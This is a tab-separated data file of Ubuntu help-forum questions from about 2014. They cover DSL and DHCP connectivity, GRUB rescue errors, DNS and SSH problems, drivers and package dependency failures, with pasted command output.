467765	why am i not able to access the internet even though ipv4 address has been allotted by isp ?	i have a wired adsl connection with a modem-cum-router . i generally connect to the internet using pppoe i.e . the router itself establishes the connection with my isp as soon as i switch it on . and the router being connected to my pc using ethernet cable provides the internet to it without any further configuration in ubuntu . however , yesterday i was facing some issues with the router so i switched it to the dsl ( bridging ) mode . this setup requires me to use sudo pppoeconf to let ubuntu know my isp username and password so that it can make the connection with isp . the internet was fine during the session after making the changes . but , after a reboot , ubuntu ca n't access the internet anymore . so , i once again switched my router to pppoe mode and the internet works fine on my dual-boot windows 7 but not on ubuntu . even after making this change ( i.e . reverting to the situation which was working all along ) i am not able to access the internet using ubuntu . however , i can see that i have been allotted the ipv4 address by my isp . following are some of the troubleshooting steps ( while in pppoe mode ) , that i took : $ ifconfig eth0 link encap : ethernet hwaddr 94 : de:80:34:47:7b inet6 addr : fe80 : :96de:80ff : fe34:477b/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1 errors:0 dropped:0 overruns:0 frame:0 tx packets:33 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:78 ( 78.0 b ) tx bytes:4642 ( 4.6 kb ) interrupt:18 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:107 errors:0 dropped:0 overruns:0 frame:0 tx packets:107 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:7923 ( 7.9 kb ) tx bytes:7923 ( 7.9 kb ) $ route kernel ip routing table destination gateway genmask flags metric ref use iface $ ping -c 1 www.google.com ping : unknown host www.google.com then , i tried to once again run sudo pppoeconf , which gave me the following output ( i have tried this in both pppoe as well as bridging modes ) : seeing that the output of route was nothing , i ran : $ sudo route add -net 192.168.1.0 netmask 255.255.255.0 dev eth0 $ route -n kernel ip routing table destination gateway genmask flags metric ref use iface 192.168.1.0 0.0.0.0 255.255.255.0 u 0 0 0 eth0 but this did n't help much . $ ping -c 1 www.google.com ping : unknown host www.google.com $ ping -c 1 8.8.8.8 connect : network is unreachable $ dig @ 8.8.8.8 ; < < > > dig 9.9.5-3-ubuntu < < > > @ 8.8.8.8 ; ( 1 server found ) ; ; global options : +cmd ; ; connection timed out ; no servers could be reached the nameservers seem to be fine to me : $ cat /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 8.8.8.8 nameserver 8.8.4.4 $ cat /etc/resolvconf/resolv.conf.d/head # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 8.8.8.8 nameserver 8.8.4.4 i tried to access my modem configuration page on 192.168.1.1 , but i was n't able to connect to it . i had to change the modem 's gateway using the following to be able to access it ( earlier when everything was working fine , i did n't need to make any change to be able to access this page ) : sudo ifconfig eth0 192.168.1.10 netmask 255.255.255.0 up running the diagnostic tests on my modem on both ubuntu and windows gives this output : everything is working as it should on my windows 7 dual-boot system , but not on ubuntu gnome 14.04 anymore . i have tried running ubuntu using live usb , and internet works fine on it as well . why am i not able to access the internet even though ipv4 address has been allotted by isp ? what do i need to do to be able to access the internet on ubuntu ? my /etc/networking/interfaces : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback auto dsl-provider iface dsl-provider inet ppp pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf provider dsl-provider auto eth0 iface eth0 inet manual following is the dmesg output while unplugging and re-plugging the ethernet cable : $ dmesg | tail -2 [ 187.051150 ] alx 0000:02:00.0 eth0 : link down [ 214.085755 ] alx 0000:02:00.0 eth0 : nic up : 100 mbps full i have edited my /etc/network/interfaces as follows : $ cat /etc/network/interfaces # interfaces ( 5 ) file used by ifup ( 8 ) and ifdown ( 8 ) auto lo iface lo inet loopback # auto dsl-provider # iface dsl-provider inet ppp # pre-up /sbin/ifconfig eth0 up # line maintained by pppoeconf # provider dsl-provider # auto eth0 # iface eth0 inet manual auto eth0 iface eth0 inet static address 192.168.1.1 netmask 255.255.255.0 gateway 192.168.1.1 if i run sudo dhclient -d -v -nw eth0 on every reboot , it works sometimes and does n't at other times . it 's very random . following is the ouput when it works : $ sudo dhclient -d -v -nw eth0 internet systems consortium dhcp client 4.2.4 copyright 2004-2012 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth0/94 : de:80:34:47:7b sending on lpf/eth0/94 : de:80:34:47:7b sending on socket/fallback dhcpdiscover on eth0 to 255.255.255.255 port 67 interval 3 ( xid=0x51e3cec7 ) dhcprequest of 192.168.1.8 on eth0 to 255.255.255.255 port 67 ( xid=0x51e3cec7 ) dhcpoffer of 192.168.1.8 from 192.168.1.1 dhcpack of 192.168.1.8 from 192.168.1.1 bound to 192.168.1.8 -- renewal in 18451 seconds . ^c following is when it does n't work : $ sudo dhclient -d -v -nw eth0 internet systems consortium dhcp client 4.2.4 copyright 2004-2012 internet systems consortium . all rights reserved . for info , please visit https : //www.isc.org/software/dhcp/ listening on lpf/eth0/94 : de:80:34:47:7b sending on lpf/eth0/94 : de:80:34:47:7b sending on socket/fallback dhcprequest of 192.168.1.8 on eth0 to 255.255.255.255 port 67 ( xid=0x67dfb451 ) dhcpack of 192.168.1.8 from 192.168.1.1 bound to 192.168.1.8 -- renewal in 20076 seconds . ^c $ sudo cat /var/log/daemon.log | grep network cat : /var/log/daemon.log : no such file or directory i can not even access 192.168.1.1 when this command does n't work .
467767	vmware increase in disk space for ubuntu not allows to boot	i have installed vmware and installed ubuntu with hard disk space 20gb . then i have to copy and paste another project directory into ubuntu but it started giving me error of insufficient disk space . then i increased my disk space to 60 gb but still it gave me same error . so i restarted my machine but while booting i got following issue as insuffieinet disk space : try agaian later saned disabled ; edit /etc/default/saned *restoring resolver state.. * starting web server apache2 ah00558 : apache2 : could not reliably determine the server 's fully qualified domain name , using 127.0.1.1 set the 'servername ' directive globally to suppress this message and doesnot move ahead . sometimes it gives login screen and after putting credentials black screen appears . i cannt access my desktop or terminal to make changes . please help . thanks in advance .
467772	i have created an usb boot stick but windows will not startup without it	because my disk in the synology ds213+ nas crashed , i had to replace it . but there are still some files i wanted to copy . so i used my sharkoon docking station to connect to my w7 laptop . but the disk could not be read . as synology is a linux system , i checked and saw the possibility to create an ubuntu startup usb stick . and so i did using this link . because it is a normal disk without raid , i moved from step 5 to 12 . step 5 however has a very limited description ( `` instal ubuntu on an usb stick '' ) . i got more options to choose from . not all of them worked . finally one worked . it took a very long time to create the boot stick ( 50 minutes ? ) . after reboot it worked indeed , i had to choose ubuntu in a list . unfortunately the crashed disk could not be recognized , so i had to go back to windows . but i got an error when i disconnected the usb stick and rebooted . apparently the boot on my hard drive is not working properly anymore ! it still is looking for the usb stick . the error : error : no such device : 64dd08ae-b446-4792-87f7-cbdafb65095b entering rescue mode ... grub rescue > _ when i re-insert the usb stick , and reboot , i get the same menu . when i choose `` windows 7 ( loader ) ( op /dev/sda2 ) '' it starts up windows 7 properly . but i would like to do so without the usb stick . can someone please help me to solve this issue ?
467777	ubuntu 14.04 + gnome 3.10 + gnome-shell restart	is there a way to ask gnome-shell to run a shell script every time it starts ? ( like after a alt+f2 then r , not on login ) nb : if you think it 's about the start-up list , it 's not : do a alt+f2 then r and tell me if the apps in start-up list are launched : they 're not ( at least not on my setup ) . unfortunately , through a shell script it 's not working yet : # ! /bin/bash gnome-shell -- replace sleep 10 # # reset screen config xrandr -- output hdmi1 -- mode 1920x1080 -- pos 0x0 -- rotate normal -- output virtual1 -- off -- output dp1 -- off -- output edp1 -- off -- output vga1 -- off # # reset keyboard setxkbmap fr the xrandr command is working as expected on startup if i type in terminal sh rgnome.sh , gnome is restarted , but the next commands do n't seem to get executed ( and if i close the terminal it kills gnome ) ; i 'm not versed in shell scripting , so i may be doing something obvious very wrong
467780	multiple commands in evolution calendar ?	in evolution ( 3.2.3 ) i have marked several appointments and tried to move them in another calendar folder . but only one of the appointments moved . is it a characteristic of the evolution version or can i do it in one go another way ?
467783	using an internet stick with ubuntu 14.04 ( t-mobile )	i have a laptop with a newly setup ubuntu 14.04 install and i would like to use my internet stick : it 's an hsupa usb modem model : mf 195 ( according to the printing on the stick ) . the provider is t-mobile ( austria ) . i plugged it in , entered the pin , then i selected 'new broadband mobile connection ' ( in network manager ) and entered the necessary information in the install wizard . edit : output of lsusb : bus 002 device 002 : id 04f2 : b40e chicony electronics co. , ltd bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 003 : id 19d2:1515 zte wcdma technologies msm bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 005 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
467784	permission denied to to transfer files from remote server	dear ubuntu community when i copy the file from remote server ( after login in to server from my home computer ) using scp commands as follows scp -v cntpeprsolionsfullcputest.log root @ 127.0.0.1 : ~/ it asks the password of root though i. i supply it does n't accept it for 3 times and then i get permission denied ( publickey , gssapi-with-mic , password ) my verbose output i posted for you kind help how to solve the problems ? executing : program /usr/bin/ssh host 127.0.0.1 , user root , command scp -v -t ~/ openssh_4.3p2 , openssl 0.9.8e-fips-rhel5 01 jul 2008 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to 127.0.0.1 [ 127.0.0.1 ] port 22. debug1 : connection established . debug1 : identity file /home/vidhyasankar1685/.ssh/identity type -1 debug1 : identity file /home/vidhyasankar1685/.ssh/id_rsa type -1 debug1 : identity file /home/vidhyasankar1685/.ssh/id_dsa type -1 debug1 : loaded 3 keys debug1 : remote protocol version 2.0 , remote software version openssh_4.3 debug1 : match : openssh_4.3 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_4.3 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-cbc hmac-md5 none debug1 : kex : client- > server aes128-cbc hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : host '127.0.0.1 ' is known and matches the rsa host key . debug1 : found key in /home/vidhyasankar1685/.ssh/known_hosts:1 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey , gssapi-with-mic , password debug1 : next authentication method : gssapi-with-mic debug1 : unspecified gss failure . minor code may provide more information unknown code krb5 195 debug1 : unspecified gss failure . minor code may provide more information unknown code krb5 195 debug1 : unspecified gss failure . minor code may provide more information unknown code krb5 195 debug1 : next authentication method : publickey debug1 : trying private key : /home/vidhyasankar1685/.ssh/identity debug1 : trying private key : /home/vidhyasankar1685/.ssh/id_rsa debug1 : trying private key : /home/vidhyasankar1685/.ssh/id_dsa debug1 : next authentication method : password root @ 127.0.0.1 's password :
467787	how to know whether a package is available for ubuntu touch ?	in order to verify a certain package exists for ubuntu desktop , we know that we can explore : http : //packages.ubuntu.com/package-name how do i know if a package exists for ubuntu touch ? thanks !
467791	nautilus crashes when trying to change permissions as root in live session	my ubuntu went fubar after my laptop lost power during upgrade to 14.04 . when i turn on the machine it stops at a black screen with some grub text that i´m unable to comprehend and get past . i have to save a couple of new files ( that i forgot to back-up ) from my hard drive before i install ubuntu again . so i have plugged in my liveusb and installed gksu in order to copy files do external drive . i type gksu nautilus and it opens , but when i try to copy files i´m told that i don´t have permission to do so , even as root . so then i try to right-click in order to change permissions but then nautilus just closes and i´m left with this message in the terminal : error : nautilus-properties-window.c:1837 : schedule_owner_change_timeout : assertion failed : ( nautilus _is_file ( file ) ) when i googled the error i came upon a reported bug that seemed unresolved to my untrained eye . so my question is , does anyone know if there is a solution to this , or can you point me in the right direction if this has been answered elsewhere ? i´m not able to find it , but then i don´t speak tech very good . thanks in advance
467792	ubuntu installed partition changed	i had already windows installed . i brunt ubuntu 14 in my usb flash drive and when i tried to make two new partitions to install ubuntu , gparted said that from which drive i was trying to split spaces are not logical drive.then i used a software in windows and changed 'media ' labeled drive to logical.used gparted to make ext4 and swap drive by taking some spaces from 'media ' drive and installed ubuntu.it was running fine until i changed my 'media ' drive type , which was logical before.then i stuck in grub rescue unknown file system and used windows cd to fix boot.now i am again using usb pendrive to see what happened there . now it seems like partition addresses are changed ! ! it was sda9 for ext and sda10 for swipe . now its sda7 for ext and sda6 for swipe . previous ubuntu partition shows as 19gb volume and the location of ubuntu installed is /media/ubuntu why there is 'media ' in the path ? because i split those two drives from 'media ' ? now there is any way to fix it without formatting ?
467794	how to change apparmor logging file ?	apparmor logging to syslog by default . how to change apparmor config to logging to /var/log/apparmor.log for example ?
467797	what commands the suspend item in system menu really launch ?	on my laptop trying to go in sleep mode using the unity sleep item ( or closing the lid for what it is worth ) does not work well ( it goes in suspend mode very slowly and after that i am unable to wake the laptop correctly ) . when i use a simple sudo pm-suspend everything is working fine and quick . i thus would like to know exactly what actions are done by unity when trying to go in sleep mode . just for the sake of information i currently use ubuntu 14.04 on a macbookpro10,1 ( first retina edition ) using the integrated graphics card ( discrete one , which is an nvidia , is powered off so that suspend and brightness control may be usable ) and after booting directly using efi ( using refind and linux kernel efistub ) .
467798	bumblebee and intel drivers . do i need both ?	i have a laptop with nvidia geforce 650m and intel hd 4000 . to use the nvidia card i have already installed bumblebee . i just found that intel drivers are also available for 14.04 and i also found that xbmc renders hi-def videos with a bit of lag if i run it with intel card ( without optirun ) . so , i am a bit concerned that should i install intel drivers too or will bumblebee do the job ?
467801	unable to connect dsl	no dsl connection was shows in connection menu when i use plog command this msg is shows : may 16 20:20:34 ubuntu-linux pppd [ 7031 ] : unable to complete pppoe discovery may 16 20:20:34 ubuntu-linux pppd [ 7031 ] : exit . may 16 20:27:25 ubuntu-linux pppd [ 7403 ] : plugin rp-pppoe.so loaded . may 16 20:27:25 ubuntu-linux pppd [ 7405 ] : pppd 2.4.5 started by ubuntu , uid 1000 may 16 20:28:00 ubuntu-linux pppd [ 7405 ] : timeout waiting for pads packets may 16 20:28:01 ubuntu-linux pppd [ 7405 ] : unable to complete pppoe discovery may 16 20:29:06 ubuntu-linux pppd [ 7405 ] : timeout waiting for pads packets may 16 20:29:06 ubuntu-linux pppd [ 7405 ] : unable to complete pppoe discovery
467803	installing ubuntu 14.04 onto external hdd	i 'm having problems with installing ubuntu 14.04 onto my verbatim 1tb external drive . i tried all kinds of tutorials , partitioning but nothing seems to work . i did put the bootloader on sdc ( hard drive ) when i boot from the hdd , it just loads grub rescue . i 'm installing this from laptop hp probook 455 , could this be a problem ? what partitions should i put ; where should ntfs partition be and what mount point ? i 've tried repairing grub from live cd , do n't know what to try else .
467804	preseeding does not work properly in ubuntu 14.04	we use the preseed method to automate the installation process since ubuntu 10.04 . in particular , we use the pkgsel/include parameter to preinstall a set of packages . up to ubuntu 12.04 everything worked fine . for the old versions , we used the alternate installer . now we try to migrate to ubuntu 14.04 . since there is no alternate installer anymore , we use the standard installer . in principle the installer recognizes the preseed file . for example , it correctly extracts the partition layout , sets the correct root password and mirror . however , it ignores the pkgsel/include option . it just installs the standard set of packages . moreover , it ignores the hostname obtained from dhcp . any ideas ?
467811	ubuntu stays on desktop background picture	when i turn my pc on it works until bacground picture comes . but than nothing comes . no desktop icons , no upper line settings , no left short-cut icons . nothing . i can move mouse pointer on an empty screen but can do nothing with my keyboard . ctrl+alt+del does not work , ctrl+alt+t does not work , alt+f4 does not work ... i do n't want to reinstall ubuntu and format my pc . hope smeone would help me . thanks in advance .
467812	unable to find expected entry 'restricted/binary-amd64/packages ' in release file	i use 64bit ubuntu 14.04 . when i run sudo apt-get update it gives the following error . unable to find expected entry 'restricted/binary-amd64/packages ' in release file w : failed to fetch http : //archive.ubuntukylin.com:10006/ubuntukylin/dists/trusty/release unable to find expected entry 'restricted/binary-amd64/packages ' in release file ( wrong sources.list entry or malformed file ) e : some index files failed to download . they have been ignored , or old ones used instead . could anyone tell me how to fix this problem ?
467813	lxpanel clock displays as icon instead of text	suddenly my clock displays an icon with the wrong time instead of the digital numbers . and lxpanel is constantly using a whole core . i am on kernel : linux 3.13.0-24-generic ( x86_64 ) , and distribution : ubuntu 14.04 lts help ! ask for more info if needed .
467818	access ubuntu server over vpn	i have remote server ( ubuntu server ) . i access remote server by ssh as ssh root @ ip_of_server , then i have setup a webapp running in server and access it by ip_of_server:80 . every thing is working fine . now i want to access server only over vpn means ssh over vpn connection . here is my setup local system < -- -- > mikrotik router < -- -- -- -- -internet -- -- -- - > remote server ( ubuntu ) i have installed ipsec_l2tp_vpn_with_ubuntu_12.04 in remote server . in mikrotik router i have setup l2tp client now i can able to connect to vpn server of ubuntu from mikrotik router . i can also able to ping remote server , but i ca n't do ssh to remote server when vpn is connected and also ca n't get webapp ( ip_of_server:80 ) in my local system . what would be the problem ? outside vpn , remote server is accessible over ssh but not inside vpn . my local system is also have ubuntu .
467822	stuck downloading and installing ubuntu	i have a 32 bit sony laptop with 2+2 mb ram and windows 7 starter , i want to install ubuntu and eventually replace windows , the thing is that first i did download ubuntu 64 bit and it did not install well , now i am downloading a 32 bit as maybe that is the reason . one thing i wonder is about the installation as well , when it is downloaded it is in a mirror software package , and downloads into the laptop download section , once i open the software it mounts into installation mode and reboot however , one it gives the option windows or ubuntu and select ubuntu it gets stuck on the start up . in the installation manual procedure it talks about a cd , is it means that i have to burn the mirror file into a blank cd first ( laptop to cd ) and then install from the cd ? ? thanks for your support , i am looking forward to experiment and get to know ubuntu and see other choices than windows ... regards billy
467823	`` rfkill list all '' not showing anything on the prompt ?	i have dual installed ubuntu 12.04 with windows 8 recently . when i execute rfkill list all command it just returns back to prompt , it does n't return anything . any help ? > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $ rfkill list all > gaurav @ gaurav-hp-pavilion-g6-notebook-pc : ~ $
467826	alt+shift combination is n't working on lubuntu 14	well , i 've just installed lubuntu with two langauges and for some reason when i 'm pressing alt+shift , things just do n't work and the language is n't changing . this is the first time that this some kind of problem happens for me . can anyone help me please ? thanks .
467827	can not install ps3 media server on ubuntu 14.04 lts	i can not install the ps3 media server onto ubuntu 14.04 lts . when i try to run the recommended commands i get the following error message . `` the following packages have unmet dependencies : ps3mediaserver : depends : ps3mediaserver-multiarch but it is not installable e : unable to correct problems , you have held broken packages . '' the commands i used are : sudo add-apt-repository ppa : happy-neko/ps3mediaserver sudo apt-get update sudo apt-get install ps3mediaserver i do not know what the `` ps3mediaserver-multiarch '' part is about at all . i have searched high and low but no one seems to really know . i have even posted on other ubuntu support sites . no one seems to know on the other sites . does anyone have any ideas on a way to get ps3 media server installed on ubuntu 14.04 lts ? o_o any feed back is much appreciated . just a heads up , i have installed mencoder , ffmpeg and other transcoding tools like vlc , ect . this did not assist in solving the issue . i have tried user278794 's solution from another thread but that does not work either . their commands were as follows . sudo gedit /etc/apt/sources.list paste this deb-src http : //ppa.launchpad.net/happy-neko/ps3mediaserver/ubuntu raring main deb http : //ppa.launchpad.net/happy-neko/ps3mediaserver/ubuntu raring main exit . sudo apt-get install ps3mediaserver the first sudo command goes right . but when i try to paste the next lines into the editing window it will not save them . when i try to save/exit it gives off this message . `` could not find the file `` /etc/apt/sources.list '' . please check that you typed the location correctly and try again . '' am i doing something wrong with those commands ? i am rather new to linux ubuntu so i am not sure . as the software package is not available in the software center this is rather frustrating . again , any feedback is much appreciated .
467828	how is x started on ubuntu ?	i would like to know the exact process used by ubuntu ( if possible with location of configuration file ) in order to start x ( with lightdm ) . i did not find any precise , detailed and comprehensive documentation of this process . some of the questions i would like to be detailed are : what scripts and configuration files are used ( i mean where are they ) ? how to customize them in a clean way ? how does x determine which graphics card ( and thus the driver ) it will use ( since xorg.conf seems useless nowaday ) on computer with integrated and discrete cards ? how to force x to use a specific driver ( in order to avoid lots of useless log messages ) ? what are the relations between the linux kernel driver and xorg graphics driver ?
467830	cant enable bluetooth on thinkpad x220 xubuntu 14.04	i am having problems enabling bluetooth since installing xubuntu 14.04 on my thinkpad x220 , in 13.10 all was working fine . when i installed 14.04 i did a fresh install rather than upgrade . running /proc/acpi/ibm/bluetooth returns no such file or directory , so i 'm guessing that i do n't have the appropriate ibm bluetooth drivers installed . /proc/acpi/ibm/ only contains : beep , cmos , driver , fan , hotkey , led , light , video , volume where can i get these from ? cheers jim update : it would appear that the bluetooth daughter card is not being recognised at all , i have swapped the card over as i have 2 of them , but still no luck . as far as i am aware the bluetooth daughter cards are usb based . the output of 'lsusb ' returns : bus 002 device 003 : id 15ca:00c3 textech international ltd. mini optical mouse bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 004 : id 04f2 : b217 chicony electronics co. , ltd lenovo integrated camera ( 0.3mp ) bus 001 device 003 : id 147e:2016 upek biometric touchchip/touchstrip fingerprint sensor bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub
467831	error while installing the ubuntu os	i 'm trying to install ubuntu 13.10 on the virtual box on my hp laptop it has following configurations : 6gb ram i3-3110m cpu @ 2.40ghz 64-bit operating system but while it installs the os it shows me error , which states that : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu .
467836	adjust daylight savings in lxde	is there a way to make lxde adjust the clock for daylight savings ? it does n't have to be done automatically , i can `` click the button myself '' but just not tamper with the value of the clock itself . ... automatic would be preferable anyway .
467837	razer keyboard macros	when i had windows , i had a software called `` razer synapse '' which let me assign macros to my keyboard keys . you see , my keyboard is a razer blackwidow and it has 5 additional keys , that i used to assign my username , email , etc to them , instead of having to type everything whenever i needed them . is there an alternative way to achieve the same thing on ubuntu ? thank you .
467838	dns configuration questions	the system : ubuntu server 12.04 lts the system has the ethernet interfaces eth0 and lo background : so i installed and configured dnsmasq on my system . dnsmasq somehow managed to update /etc/resolv.conf setting itself as the name server for the system . but how did it do that without modifying /etc/network/interfaces.d/eth0.cfg ? also perplexing is that for whatever reason dnsmasq did n't update the search field in /etc/resolv.conf in spite of the fact that we configured the domain in /etc/dnsmasq.conf and /etc/hosts . same as before , how come this setting isnt reflected in /etc/network/interfaces.d/eth0.cfg . how did it get there ? lastly , the search parameter is set as ec2.internal . however , the fqdn for the system is ldap.mydomain.com , so should n't the value of search be mydomain.com ? my questions in brief : how did settings end up in /etc/resolv.conf without being in /etc/network/interfaces.d/eth0.cfg first ? how come the search field is n't up to date ? how do i update the search field ? do i edit /etc/network/interfaces.d/eth0.cfg ? what should the value of search be ? i think it should be mydomain.com , is that right ? even though the name server is already set in /etc/resolv.conf , should i set the name server in /etc/network/interfaces.d/eth0.cfg anyways ? in /etc/network/interfaces.d/eth0.cfg , can i set individual parameters like name server even though the interface is marked as dhcp ? configuration files : /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search ec2.internal /etc/network/interfaces.d/eth0.cfg # the primary network interface auto eth0 iface eth0 inet dhcp /etc/hosts 127.0.0.1 localhost.localdomain localhost 192.168.0.1 ldap.mydomain.com ldap # the following lines are desirable for ipv6 capable hosts : :1 ip6-localhost ip6-loopback fe00 : :0 ip6-localnet ff00 : :0 ip6-mcastprefix ff02 : :1 ip6-allnodes ff02 : :2 ip6-allrouters ff02 : :3 ip6-allhosts /etc/hostname ldap
467843	cant update or install anything tor geoipd not installed	when i go to the ubuntu software center i get and try to update i get the error installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 172818 files and directories currently installed . ) preparing to unpack ... /tor_0.2.4.20-1_amd64.deb ... unpacking tor ( 0.2.4.20-1 ) ... dpkg : error processing archive /var/cache/apt/archives/tor_0.2.4.20-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/bin/tor ' , which is also in package tor-browser 3.5.4 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) processing triggers for ureadahead ( 0.100.0-16 ) ... errors were encountered while processing : /var/cache/apt/archives/tor_0.2.4.20-1_amd64.deb error in function : dpkg : dependency problems prevent configuration of tor-geoipdb : tor-geoipdb depends on tor ( > = 0.2.4.20-1 ) ; however : package tor is not installed . dpkg : error processing package tor-geoipdb ( -- configure ) : dependency problems - leaving unconfigured how do i fix this ? and what did i do wrong ?
467844	searching for a memory and brain games in ubuntu	is there any recommendation for games to train the brain in ubuntu or in linux , did any one try a game and it was a good one on ubuntu
467846	wifi network detected but not working	i was using internet connectivity by making my smartphone as wifi hotspot . once i used internet connectivity using ethernet cable.i made manual proxy settings & ip addresses . after that i am not able to connect to internet using my smartphone wifi hotspot . the wifi connection is detected at the right top corner of my ubuntu desktop . it shows it 's status as connected . but when i open the browser i can not get the requested web page . i searched a lot about this problem on google . but did't find a working solution . can anyone help me about this problem ?
467849	need some help with adding to “startup application” in 14.04	first of all i know this post may appear to be a repeat , and that there is a plethora of posts , blogs and help files available on this subject . however i’m find that something has changed between 14.04 and all other releases . sorry i need to express my frustrations before i ask a few simple questions , which i ensure you from a newbie’s viewpoint they are worth asking . so if you desire , to skip the rant , please skip to the questions . this is my third day using ubuntu 14.04 and so far i’m liking it over windows xp/7 and really want to completely transition to linux . being a victim of microsoft’s business model of “future sales through forced obsolescence” is proving to be a strong motivator . having to update already purchased applications for xp due to the incompatibility with win7/8 is looking to be very expensive for me and on top of that the added cost of a new operating systems . i have three computers at home that the family uses and having to update all of them is out of the question . plus i’m the it support for others in my extended family , which is nearly an additional 10 computers . as a newbie with the hopes of using ubuntu as a windows xp/7 replacement these difficulties and indifferences are making it rather difficult in understanding linux and seem to be clouding my perception a bit . so please help me to make the transitions and i will bring others over from the windows side . anyway i apologize for expressing my frustration , but i feel it may help other new users to understand that there are some major challenges in learning linux , and not to give up . that is why i’m asking these questions . all these questions stem from the simple task of adding skype to my “applications startup” . question 1 ) in more than one reference i have found that there was an “options” in the “startup applications” that would allow me to check a box to start the applications already open on the next reboot/restart . but that seems to have been removed or moved . is this true ? question 2 ) one source mentioned just dragging the icon from the “dash > search” to the “applications startup” . it didn’t work for me . so is there something setup wrong on my installation , is this something special that use to work , or was the post wrong ? question 3 ) in the post “how do i make a program auto-start every time i log in ? ” ( how do i make a program auto-start every time i log in ? ) one user posted a neat python script to show all the start commands for all the applications installed . i like it and hope it does the job for me , but i would like to know what are my other options in ubuntu 14.04 , what is the correct way , is scripts really needed or is there other utilities i can use to view the commands that i need to add ? question 4 ) starting out to learn ubuntu 14.04 i’m finding a lot has changed from the prior releases and all other posted information is not completely correct . can anyone point me to an ubuntu 14.04 for dummies , or great tutorials to help me move from windows to ubuntu ? again i apologize for the rant and really appreciate the support of the linux community .
467851	grub bootloader + windows	okay so like 2 days ago i installed ubuntu on my hp nootbook dm1 ( it has no cd-drive ) . then , today i deleted my linux partiton ( not knowing about grub bootloader ) and it just boots fine into windows now , no problems , but if i just startup my computer it says ''pres escape to go to bootsetup '' ( or something like this ) when i do this i can chose from the optrions , `` startop whit os maneger '' , `` startup from notebook harddrive '' , when i jsut pick os manneger it just does it job and boots in to windows , but when i click on ''startup from notebook harddrive '' i get the grub error , is there just any whay i just can delete grub ? beacause my computer boots fine when i do n't pres escape and select starup from harddrive . and maybe in the future i wan na install ubuntu again , does this mean i have to unistall grub first and then reinstaal ubuntu ? thanks for helping me out !
467853	can ssh with ip but not host name ?	when i ssh directly to the server 's ip address , it works . ( ssh michael @ 10.1.10.129 ) for reference , here is the resulting prompt : michael @ noranetserver : ~ $ however ssh-ing by name does n't work like so : ssh michael @ noranetserver ssh : could not resolve hostname noranetserver : nodename nor servname provided , or not known why would this be ?
467857	ca n't boot ubuntu after windows 8 update	i installed ubuntu along side a pre-installed windows 8 system and every thing was working fine . however every time that windows 8 updates itself ubuntu becomes unbootable . infact i do n't get the grub boot menu at all , it just boots straight to windows . it 's not that big of a deal because i can run boot-repair and fix the boot problem , but it is vary annoying that i have to do that after every update . is there a way that i do n't have to run boot-repair after every update ? thanks in advance !
467858	how do i enable/disable wifi in lubuntu 14.04	in ubuntu ( 14.04 ) wifi cards can be enabled/disabled by clicking 'enable wi-fi ' , how can i get this feature in lubuntu too ? ubuntu ( 14.04 ) : lubuntu ( 14.04 ) : in the latter the four last menu entries are gone somehow .
